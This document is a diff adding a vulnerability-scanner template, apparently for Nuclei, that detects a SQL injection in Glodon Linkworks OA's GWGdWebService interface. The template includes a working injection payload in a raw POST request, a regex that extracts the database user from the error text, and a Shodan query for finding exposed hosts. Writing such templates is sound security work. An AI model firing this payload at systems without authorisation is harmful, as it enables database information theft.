Create glodon-linkworks-sqli.yaml

http/vulnerabilities/other/glodon-linkworks-sqli.yaml

@@ -0,0 +1,32 @@
+id: glodon-linkworks-sqli
+
+info:
+  name: Glodon Linkworks GWGdWebService SQL injection
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
+  reference:
+    - https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    shodan-query: "Services/Identification/login.ashx"
+    verified: true
+  tags: glodon,linkworks,sqli
+
+http:
+  - raw:
+      - |
+        POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+        Content-Type: application/x-www-form-urlencoded
+
+        employeeCode=1'-1/user--'&EncryptData=1
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'